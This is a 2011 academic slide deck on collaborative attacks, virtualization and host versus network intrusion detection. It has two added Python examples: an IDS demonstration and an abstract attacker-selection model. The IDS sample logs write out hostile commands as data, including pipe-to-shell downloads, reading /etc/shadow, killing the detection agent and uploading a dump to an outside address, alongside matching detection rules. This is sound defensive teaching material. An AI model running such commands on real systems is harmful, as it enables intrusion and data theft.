
1 Research Direction Introduction  Advisor: Professor Frank, Y.S. Lin  Presented by Chi-Hsiang Chan  2011/10/11

2 Agenda
- Introduction
- Collaborative Attack
- Virtualization
- Problem description
- Scenario


4 Collaborative Attack
- Collaborative attacks are characterized by the prevalence of coordination before and during attacks. [1]
- Collaborative attacks in general involve multiple human attackers or criminal organizations that each bring their own adversarial expertise but may not fully trust each other.
- Collaborative attacks are more powerful than the sum of the underlying individual attacks that the individual attackers could launch independently.

5 Collaborative Attack (figure)

6 Collaborative Attack
- Time aspect of collaborative attack C&C
  - Off-line coordination: during the attack there is no communication between the attackers, nor between the commander and the attackers.
  - On-line coordination: the commander and the attackers may communicate and make adjustments during an attack.
  - Real-time coordination: both the attackers and the commander are always updated with the current global system state.
- Power: off-line < on-line < real-time

7 Collaborative Attack
- Space aspect of collaborative attack C&C
  - Centralized C&C: a single attacker coordinates the collaborative attack.
  - Distributed C&C: multiple attackers command the adversarial computers that launch the attacks; there may be a hierarchical structure inside.
  - Peer-to-peer C&C: the multiple attackers play equal roles.
- Sophistication: centralized < distributed < peer-to-peer

8 Collaborative Attack
- Effect of collaborative attacks
  - Spatially collaborative attacks: a set of adversarial computers, located in different geographic or network places, are coordinated to launch attacks against a target at the same time.
  - Temporally collaborative attacks: the attack proceeds in a well-orchestrated fashion; each step of the attack process may be launched by a different attacker, possibly residing at a different geographic or network place.
  - Hybrid collaborative attacks

9 Collaborative Attack
- Information exchange during collaborative attacks
  - One-way: information may only be sent from one participant to another, not in the other direction. This may decrease the chance that the attackers are detected.
  - Two-way: allows the sharing of situational awareness, which may be needed in order to launch sophisticated attacks.

10 Collaborative Attack
- Privacy aspect of collaborative attacks
  - Exploiting anonymous channels
  - Enforcing content privacy
  - Exploiting anonymous channels and enforcing content privacy

11 Collaborative Attack
- Advantages of collaborative attack [2]
  - Coordinated attacks can be designed to avoid detection.
  - It is difficult to differentiate between decoy and actual attacks.
  - There is a large variety of coordinated attacks.

12 Virtualization
- Definition: virtualization refers to technologies designed to provide a layer of abstraction between computer hardware systems and the software running on them. [3]
(Figure source: VMware)

13 Virtualization
- Benefits
  - Lower cost
  - Efficiency
  - Scalability
  - Easy to run multiple operating system environments
  - Better space utilization in the data center through server consolidation
- Virtualization is the key to cloud computing

14 IDS
- An intrusion detection system (IDS) is a security system that monitors computer systems and network traffic and analyzes that traffic for possible hostile attacks originating from outside the organization, and also for system misuse or attacks originating from inside the organization. [4]
- Covers more than a firewall, which only filters the traffic coming in from the Internet and does not see misuse from inside.

15 IDS
- Two types of IDS
  - Host IDS (HIDS)
  - Network IDS (NIDS)
- The trade-off is evident when comparing HIDS and NIDS
  - NIDS offers high attack resistance at the cost of visibility.
  - HIDS offers high visibility but sacrifices attack resistance.

16 Agenda
- Introduction
- Collaborative Attack
- Virtualization
- Problem description
- Scenario

17 Problem Description

18 Attacker View
- Commander
- Attackers
  - Initial location
  - Budget
  - Capability
- Objective
  - Steal confidential information
  - Service disruption

19 Defender View
- Special defense resources
  - Cost budget
    - VM IDS (signature-based) [5]
    - Cloud security service
  - Costless (decreases QoS)
    - VM local defense
    - Dynamic topology reconfiguration [6]

20 Per Hop Decision
- Period decision
  - Early stage
  - Late stage
- Strategy decision by criteria
  - Compromise → risk avoidance
  - Pretend to attack → risk tolerance
- No. of attackers
- Choose ideal attackers
  - Aggressiveness
  - Attack energy
  - Budget
  - Capability

21 Time Issue
- Attackers
  - Compromise time
  - Recovery time
- Defender
  - Signature generation time
  - Reconfiguration impact on QoS

22 Synergy
- Pros
  - Lower budget cost for each attacker
  - Less recovery time
  - Less compromise time
- Cons
  - Higher probability of being detected

23 Early Period, Risk Avoidance
- Purpose
  - Try to compromise nodes as fast as possible
  - Keep the stronger attackers for compromising core nodes

24 Agenda
- Introduction
- Collaborative Attack
- Virtualization
- Problem description
- Scenario

25 Scenario
- Figure legend: general node, core node, cloud security agent, VMM environment, third party's defense center, cloud security provider

26 Scenario (figure: network of nodes A to J)

27 Early Stage Attack Strategy (figure: nodes A to J)

28 Local Defense (figure: nodes A to J)

29 IPDS request signature (figure: nodes A to J; "Signature generating...")

30 Late Stage Attack Strategy (figure: nodes A to J; "Signature generating...")

31 Attack VMM (figure: nodes A to J; "Signature generating...")

32 Risk Level, Reconfiguration (figure: nodes A to J; "Signature generating...")

33 Cloud Security Service (figure: nodes A to J; "Signature generating...")

34 Transfer Signature (figure: nodes A to J)

35 Failure of Attacker (figure: nodes A to J)

36 Failure of Defender (figure: nodes A to J)

37 Thanks for listening!

38 Reference
- [1] S. Xu, "Collaborative Attack vs. Collaborative Defense", Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol. 10, part 2, pp. 217-228, 2009.
- [2] S. Braynov and M. Jadliwala, "Representation and Analysis of Coordinated Attacks", Proc. FMSE '03, 2003.
- [3] J. K. Waters, "Virtualization Definition and Solutions", 2008, http://www.cio.com/article/40701/Virtualization_Definition_and_Solutions
- [4] SANS Institute InfoSec Reading Room, "Intrusion Detection Systems: Definition, Need and Challenges", 2001.
- [5] T. Garfinkel and M. Rosenblum, "A Virtual Machine Introspection Based Architecture for Intrusion Detection", Proc. Network and Distributed Systems Security Symposium (NDSS), 2003.

39 Reference
- [6] M. Atighetchi, P. Pal, F. Webber and C. Jones, "Adaptive Use of Network-Centric Mechanisms in Cyber-Defense", BBN Technologies LLC.

40 Appendix

41 Host-based IDS
- A HIDS obtains information by watching local activity on a host: processes, system calls, logs, etc.
- Advantages
  - Detailed information about system activities.
  - Greater accuracy and fewer false positives.
- Weaknesses
  - Highly dependent on the host system.
  - Can be deactivated or tampered with by a successful intruder.

42 Network-based IDS
- A NIDS obtains data by monitoring the traffic in the network.
- Advantages
  - Operating-system independent.
  - Can detect attack attempts outside the firewall.
  - Difficult for attackers to erase their evidence, since the record is kept off the compromised host.
- Weaknesses
  - In high-traffic networks, a network monitor could miss packets or become a bottleneck.
  - Hard to get detailed information about hosts.
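To make the HIDS/NIDS trade-off of slides 15, 41 and 42 concrete, the following Python is an added example written for this page; it is not code from the presentation or from any of the cited papers. It runs a few host-side and network-side rules over constructed records: the flow and audit-log formats, the rule patterns (`HIDS_RULES`), the port-scan and exfiltration thresholds and the addresses are all assumptions chosen for the illustration. The intruder kills the host agent partway through, so the HIDS loses the final upload that the off-host NIDS still sees, while only the HIDS can report which command line produced the earlier activity.

```python
"""Added example (not from the presentation): HIDS vs NIDS visibility
over constructed sample logs. Formats, rules and thresholds are assumed."""
import re
from collections import defaultdict

# Constructed flow records as a NIDS sensor on the segment would see them:
# (time, src, dst, dst_port, bytes_sent). Host 10.0.0.7 probes 10.0.0.20,
# which later pushes a large upload to an outside address.
FLOWS = [
    (1, "10.0.0.7", "10.0.0.20", 22, 120),
    (2, "10.0.0.7", "10.0.0.20", 23, 60),
    (3, "10.0.0.7", "10.0.0.20", 80, 60),
    (4, "10.0.0.7", "10.0.0.20", 443, 60),
    (5, "10.0.0.7", "10.0.0.20", 3306, 60),
    (6, "10.0.0.7", "10.0.0.20", 8080, 60),
    (9, "10.0.0.20", "203.0.113.9", 443, 52_000_000),
]

# Constructed process-execution records from the HIDS agent on 10.0.0.20.
# The intruder kills the agent before the final upload.
HOST_EVENTS = [
    "t=7 uid=1001 exec=/bin/sh args=-c 'curl http://203.0.113.9/x | sh'",
    "t=8 uid=0 exec=/bin/cat args=/etc/shadow",
    "t=8 uid=0 exec=/bin/kill args=-9 $(pidof hids-agent)",
    "t=8 agent=hids-agent status=stopped",
    "t=9 uid=0 exec=/usr/bin/curl args=-T /tmp/dump.tgz https://203.0.113.9/up",
]


def nids_detect(flows, scan_ports=5, exfil_bytes=10_000_000):
    """Network-side rules: a port scan (one source touching `scan_ports`
    distinct ports on one destination) and a large outbound transfer.
    The sensor is off-host, so the intruder cannot stop it, but it never
    learns which command produced the traffic."""
    alerts = []
    seen_ports = defaultdict(set)
    for t, src, dst, dport, nbytes in flows:
        seen_ports[(src, dst)].add(dport)
        if len(seen_ports[(src, dst)]) == scan_ports:
            alerts.append(f"t={t} NIDS port_scan {src}->{dst} ({scan_ports} ports)")
        if nbytes >= exfil_bytes:
            alerts.append(f"t={t} NIDS large_outbound {src}->{dst}:{dport} {nbytes}B")
    return alerts


# Host-side rules (assumed patterns): precise because they see the command line.
HIDS_RULES = [
    ("pipe_to_shell", re.compile(r"curl[^']*\|\s*sh")),
    ("shadow_read", re.compile(r"args=/etc/shadow")),
    ("agent_kill", re.compile(r"exec=/bin/kill .*hids-agent")),
]


def hids_detect(events):
    """Apply HIDS_RULES to each execution record. Returns the alerts and
    the count of records that were never inspected because the agent had
    been stopped: the attack-resistance weakness of a HIDS."""
    alerts, unseen, agent_up = [], 0, True
    for line in events:
        if not agent_up:
            unseen += 1
            continue
        if "status=stopped" in line:
            agent_up = False
            continue
        t = line.split()[0]
        for name, pattern in HIDS_RULES:
            if pattern.search(line):
                alerts.append(f"{t} HIDS {name}: {line.split('exec=', 1)[1]}")
    return alerts, unseen


if __name__ == "__main__":
    for alert in nids_detect(FLOWS):
        print(alert)
    host_alerts, missed = hids_detect(HOST_EVENTS)
    for alert in host_alerts:
        print(alert)
    print(f"HIDS records not inspected after the agent was killed: {missed}")
```

Running it gives two NIDS alerts (the scan at t=5 and the 52 MB upload at t=9) and three HIDS alerts (the pipe-to-shell, the shadow read and the kill of the agent), with one record left uninspected after the agent stops. That is the trade-off of slide 15 in miniature: the NIDS keeps working through the compromise but cannot say what `/bin/sh` ran, and the HIDS knows exactly what ran until the intruder turns it off.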

43 Period
- N: the total number of nodes in the defense network.
- F: the total number of nodes in the defense network that have been compromised.

44 Selection Criteria (figure)

45 No. of Attackers
- M: number of selected candidates
- Success Rate (SR) = (risk-avoidance attacks that compromised their target) / (risk-avoidance attacks launched)
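The per-hop decision of slide 20 combines the period of slide 43 (from N and F) with the success rate of slide 45 and the early-stage rule of slide 23 (hold the stronger attackers back for core nodes). The Python below is an added example written for this page, not code from the presentation. The threshold at which F/N switches the period from early to late, the size of the reserved set, the `Attacker` record and the roster's capabilities and histories are all assumptions; the presentation gives only the symbols and the SR formula.

```python
"""Added example (not from the presentation): period decision and
attacker selection by success rate. The early/late threshold, the
reservation rule and the attack history below are assumptions."""
from dataclasses import dataclass


@dataclass
class Attacker:
    name: str
    capability: float     # relative strength on an assumed 0..1 scale
    attacks: int = 0      # risk-avoidance attacks launched so far
    compromised: int = 0  # of those, how many compromised their target

    def success_rate(self) -> float:
        """SR = risk-avoidance compromised / risk-avoidance attacks (slide 45).
        An attacker with no history gets 0.0 instead of a division error."""
        return self.compromised / self.attacks if self.attacks else 0.0


EARLY_LATE_THRESHOLD = 0.5  # assumed: the late stage begins once F/N reaches this


def period(N: int, F: int, threshold: float = EARLY_LATE_THRESHOLD) -> str:
    """Map the compromised fraction F/N (slide 43) to "early" or "late"."""
    if N <= 0 or not 0 <= F <= N:
        raise ValueError("need 0 <= F <= N and N > 0")
    return "late" if F / N >= threshold else "early"


def select_attackers(attackers, M, stage, reserve=1):
    """Return the names of the M candidates with the best SR. In the early
    stage the `reserve` strongest attackers (by capability) are held back
    for the core nodes (slide 23); in the late stage everyone is eligible.
    Ties on SR are broken by capability."""
    pool = list(attackers)
    if stage == "early":
        strongest = sorted(pool, key=lambda a: a.capability, reverse=True)[:reserve]
        pool = [a for a in pool if a not in strongest]
    ranked = sorted(pool, key=lambda a: (a.success_rate(), a.capability), reverse=True)
    return [a.name for a in ranked[:M]]


def plan_hop(N, F, attackers, M):
    """One per-hop decision (slide 20): decide the period, then pick attackers."""
    stage = period(N, F)
    return stage, select_attackers(attackers, M, stage)


# Constructed roster: capabilities and histories are made up for the example.
ROSTER = [
    Attacker("alpha", capability=0.9, attacks=10, compromised=9),
    Attacker("bravo", capability=0.6, attacks=8, compromised=6),
    Attacker("charlie", capability=0.5, attacks=4, compromised=2),
    Attacker("delta", capability=0.3),  # no history yet
    Attacker("echo", capability=0.4, attacks=5, compromised=4),
]

if __name__ == "__main__":
    for F in (2, 6):  # 2 of 10 nodes compromised, then 6 of 10
        stage, chosen = plan_hop(10, F, ROSTER, M=2)
        print(f"F/N={F}/10 -> {stage} stage, selected {chosen}")
```

With F=2 of N=10 the hop is in the early stage, so the strongest attacker (alpha) is reserved and the two best remaining success rates, echo and bravo, are sent; with F=6 the late stage lifts the reservation and alpha joins echo. The guard in `success_rate` matters for a real run: a newly added attacker with no history would otherwise raise a division-by-zero error in the middle of the selection.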

